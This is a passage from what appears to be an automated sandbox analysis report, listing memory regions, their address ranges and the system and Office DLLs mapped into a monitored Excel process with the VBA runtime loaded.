entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 774
start_va = 0x4b10000
end_va = 0x4b10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 775
start_va = 0x4ba0000
end_va = 0x4ba1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ba0000"
filename = ""
Region:
id = 776
start_va = 0x4bb0000
end_va = 0x4bb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 777
start_va = 0x4bc0000
end_va = 0x4bc1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 778
start_va = 0xdcd0000
end_va = 0xec9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000dcd0000"
filename = ""
Region:
id = 779
start_va = 0xeca0000
end_va = 0xfc6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000eca0000"
filename = ""
Region:
id = 780
start_va = 0x4c30000
end_va = 0x4c30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 781
start_va = 0x4ca0000
end_va = 0x4ca2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 782
start_va = 0x4cb0000
end_va = 0x4cb2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 783
start_va = 0x4cc0000
end_va = 0x4cc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 784
start_va = 0x4e80000
end_va = 0x4e83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e80000"
filename = ""
Region:
id = 785
start_va = 0x4e90000
end_va = 0x4e94fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 786
start_va = 0x4ea0000
end_va = 0x4ea0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ea0000"
filename = ""
Region:
id = 787
start_va = 0x5310000
end_va = 0x5312fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 788
start_va = 0x5320000
end_va = 0x5320fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005320000"
filename = ""
Region:
id = 789
start_va = 0x5df0000
end_va = 0x5dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005df0000"
filename = ""
Region:
id = 790
start_va = 0x6060000
end_va = 0x606ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 791
start_va = 0x6070000
end_va = 0x6070fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 792
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 793
start_va = 0x8e00000
end_va = 0x8e16fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 794
start_va = 0x8e20000
end_va = 0x8e20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e20000"
filename = ""
Region:
id = 795
start_va = 0x8e30000
end_va = 0x8e30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e30000"
filename = ""
Region:
id = 796
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 797
start_va = 0x7fef3170000
end_va = 0x7fef3361fff
monitored = 0
entry_point = 0x7fef317101c
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 798
start_va = 0x8510000
end_va = 0x860ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 799
start_va = 0x8610000
end_va = 0x887ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008610000"
filename = ""
Region:
id = 800
start_va = 0x8610000
end_va = 0x87cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008610000"
filename = ""
Region:
id = 801
start_va = 0x8800000
end_va = 0x887ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008800000"
filename = ""
Region:
id = 802
start_va = 0x8610000
end_va = 0x86cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 803
start_va = 0x8750000
end_va = 0x87cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008750000"
filename = ""
Region:
id = 804
start_va = 0xd7f0000
end_va = 0xdbeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000d7f0000"
filename = ""
Region:
id = 805
start_va = 0x3b50000
end_va = 0x3b50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 806
start_va = 0xfc70000
end_va = 0x100cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 807
start_va = 0xfc70000
end_va = 0x100eefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 808
start_va = 0x9f30000
end_va = 0xa290fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f30000"
filename = ""
Region:
id = 809
start_va = 0x100f0000
end_va = 0x110bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000100f0000"
filename = ""
Region:
id = 810
start_va = 0x110c0000
end_va = 0x1208ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000110c0000"
filename = ""
Region:
id = 811
start_va = 0x12090000
end_va = 0x1305ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000012090000"
filename = ""
Region:
id = 812
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 813
start_va = 0x4ca0000
end_va = 0x4ccffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "xlsrvintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\xlsrvintl.dll")
Region:
id = 814
start_va = 0x4e80000
end_va = 0x4eaffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "xlsrvintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\xlsrvintl.dll")
Region:
id = 815
start_va = 0x7fef40f0000
end_va = 0x7fef4520fff
monitored = 1
entry_point = 0x7fef42533cc
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 816
start_va = 0x41b0000
end_va = 0x41b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041b0000"
filename = ""
Region:
id = 817
start_va = 0x753c0000
end_va = 0x75491fff
monitored = 0
entry_point = 0x753e14e4
region_type = mapped_file
name = "msvcr100.dll"
filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll")
Region:
id = 818
start_va = 0x5310000
end_va = 0x532ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 819
start_va = 0x9f30000
end_va = 0xa1b0fff
monitored = 1
entry_point = 0x9f44c98
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 820
start_va = 0x7fee7440000
end_va = 0x7fee76cefff
monitored = 1
entry_point = 0x7fee7454c98
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 821
start_va = 0x41d0000
end_va = 0x41d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041d0000"
filename = ""
Region:
id = 822
start_va = 0x4ba0000
end_va = 0x4baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ba0000"
filename = ""
Region:
id = 823
start_va = 0x7fef40c0000
end_va = 0x7fef40e5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbe7intl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll")
Region:
id = 824
start_va = 0x4c30000
end_va = 0x4c39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normnfd.nls"
filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls")
Region:
id = 825
start_va = 0x8880000
end_va = 0x897ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008880000"
filename = ""
Region:
id = 826
start_va = 0x9f30000
end_va = 0xa030fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f30000"
filename = ""
Region:
id = 827
start_va = 0x13060000
end_va = 0x1402ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000013060000"
filename = ""
Region:
id = 828
start_va = 0xa040000
end_va = 0xa140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a040000"
filename = ""
Region:
id = 829
start_va = 0xa150000
end_va = 0xa250fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a150000"
filename = ""
Region:
id = 830
start_va = 0x14030000
end_va = 0x14ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000014030000"
filename = ""
Region:
id = 831
start_va = 0xa7f0000
end_va = 0xa8f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a7f0000"
filename = ""
Region:
id = 832
start_va = 0xae40000
end_va = 0xaf40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ae40000"
filename = ""
Region:
id = 833
start_va = 0x15000000
end_va = 0x15fcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000015000000"
filename = ""
Region:
id = 834
start_va = 0x7fefb770000
end_va = 0x7fefb79bfff
monitored = 0
entry_point = 0x7fefb7715c4
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 835
start_va = 0xaf50000
end_va = 0xb050fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000af50000"
filename = ""
Region:
id = 836
start_va = 0x7fef9bd0000
end_va = 0x7fef9bddfff
monitored = 0
entry_point = 0x7fef9bd5500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 837
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 838
start_va = 0x15fd0000
end_va = 0x16f9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000015fd0000"
filename = ""
Region:
id = 839
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 840
start_va = 0x16fa0000
end_va = 0x170a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000016fa0000"
filename = ""
Region:
id = 841
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 842
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 843
start_va = 0x170b0000
end_va = 0x171b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000170b0000"
filename = ""
Region:
id = 844
start_va = 0x171c0000
end_va = 0x1818ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000171c0000"
filename = ""
Region:
id = 845
start_va = 0x5310000
end_va = 0x5311fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005310000"
filename = ""
Region:
id = 846
start_va = 0x5320000
end_va = 0x532ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005320000"
filename = ""
Region:
id = 847
start_va = 0x5df0000
end_va = 0x5df1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005df0000"
filename = ""
Region:
id = 848
start_va = 0x6060000
end_va = 0x606ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 849
start_va = 0x6070000
end_va = 0x607ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 850
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 851
start_va = 0x8510000
end_va = 0x8510fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 852
start_va = 0x8520000
end_va = 0x8520fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008520000"
filename = ""
Region:
id = 853
start_va = 0x8530000
end_va = 0x8546fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 854
start_va = 0x8550000
end_va = 0x8550fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008550000"
filename = ""
Region:
id = 855
start_va = 0x8590000
end_va = 0x860ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008590000"
filename = ""
Region:
id = 856
start_va = 0x6060000
end_va = 0x6060fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 857
start_va = 0x6070000
end_va = 0x6072fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 858
start_va = 0x6ec0000
end_va = 0x6ec2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 859
start_va = 0x8530000
end_va = 0x8533fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 860
start_va = 0x8540000
end_va = 0x8544fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008540000"
filename = ""
Region:
id = 861
start_va = 0x8560000
end_va = 0x8562fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008560000"
filename = ""
Region:
id = 862
start_va = 0x8570000
end_va = 0x8570fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008570000"
filename = ""
Region:
id = 863
start_va = 0x8580000
end_va = 0x8582fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008580000"
filename = ""
Region:
id = 864
start_va = 0x86d0000
end_va = 0x86d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 865
start_va = 0x86e0000
end_va = 0x86e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086e0000"
filename = ""
Region:
id = 866
start_va = 0x7fef40a0000
end_va = 0x7fef40bdfff
monitored = 0
entry_point = 0x7fef40a1318
region_type = mapped_file
name = "hlink.dll"
filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll")
Region:
id = 867
start_va = 0x7fee6ba0000
end_va = 0x7fee7437fff
monitored = 0
entry_point = 0x7fee6ba54c0
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")
Region:
id = 868
start_va = 0x6060000
end_va = 0x6060fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006060000"
filename = ""
Region:
id = 869
start_va = 0xa600000
end_va = 0xa69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a600000"
filename = ""
Region:
id = 870
start_va = 0x18190000
end_va = 0x183affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 871
start_va = 0x6070000
end_va = 0x6070fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 872
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 873
start_va = 0x8510000
end_va = 0x8515fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 874
start_va = 0x8530000
end_va = 0x8586fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 875
start_va = 0x86d0000
end_va = 0x86d3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 876
start_va = 0x86f0000
end_va = 0x86f8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086f0000"
filename = ""
Region:
id = 877
start_va = 0x8700000
end_va = 0x8712fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008700000"
filename = ""
Region:
id = 878
start_va = 0x8720000
end_va = 0x8723fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008720000"
filename = ""
Region:
id = 879
start_va = 0x8730000
end_va = 0x8739fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 880
start_va = 0xaa00000
end_va = 0xaac2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aa00000"
filename = ""
Region:
id = 881
start_va = 0xad00000
end_va = 0xada1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ad00000"
filename = ""
Region:
id = 882
start_va = 0xadc0000
end_va = 0xae3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000adc0000"
filename = ""
Region:
id = 883
start_va = 0x18190000
end_va = 0x182fcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 884
start_va = 0x18330000
end_va = 0x183affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018330000"
filename = ""
Region:
id = 885
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 886
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 887
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 888
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 889
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 890
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 891
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 892
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 893
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 894
start_va = 0x87d0000
end_va = 0x87e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087d0000"
filename = ""
Region:
id = 895
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 896
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 897
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 898
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 899
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 900
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 901
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 902
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 903
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 904
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 905
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 906
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 907
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 908
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 909
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 910
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 911
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 912
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 913
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 914
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 915
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 916
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 917
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 918
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 919
start_va = 0x183b0000
end_va = 0x184a8fff
monitored = 0
entry_point = 0x183b3830
region_type = mapped_file
name = "excel.exe"
filename = "\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\excel.exe")
Region:
id = 920
start_va = 0x8740000
end_va = 0x8743fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 921
start_va = 0xb180000
end_va = 0xb208fff
monitored = 0
entry_point = 0xb18caf0
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll")
Region:
id = 922
start_va = 0x8980000
end_va = 0x89a8fff
monitored = 0
entry_point = 0x8a4f400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 923
start_va = 0x8530000
end_va = 0x856ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 924
start_va = 0x8510000
end_va = 0x8512fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 925
start_va = 0x8570000
end_va = 0x8573fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008570000"
filename = ""
Region:
id = 926
start_va = 0x8580000
end_va = 0x8580fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008580000"
filename = ""
Region:
id = 927
start_va = 0x86d0000
end_va = 0x86d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 928
start_va = 0x86f0000
end_va = 0x86f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086f0000"
filename = ""
Region:
id = 929
start_va = 0x8700000
end_va = 0x8703fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008700000"
filename = ""
Region:
id = 930
start_va = 0x9190000
end_va = 0x91cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009190000"
filename = ""
Region:
id = 931
start_va = 0x8710000
end_va = 0x8713fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008710000"
filename = ""
Region:
id = 932
start_va = 0x8720000
end_va = 0x8723fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008720000"
filename = ""
Region:
id = 933
start_va = 0x87d0000
end_va = 0x87e6fff
monitored = 1
entry_point = 0x89333cc
region_type = mapped_file
name = "vbe7.dll"
filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll")
Region:
id = 934
start_va = 0x7fef3fe0000
end_va = 0x7fef4099fff
monitored = 0
entry_point = 0x7fef3fe1040
region_type = mapped_file
name = "uiautomationcore.dll"
filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll")
Region:
id = 935
start_va = 0xfc70000
end_va = 0xfe8efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 936
start_va = 0x8730000
end_va = 0x8735fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 937
start_va = 0x8e00000
end_va = 0x8e28fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 938
start_va = 0x8e40000
end_va = 0x8e68fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 939
start_va = 0xfe90000
end_va = 0xff9afff
monitored = 1
entry_point = 0x0
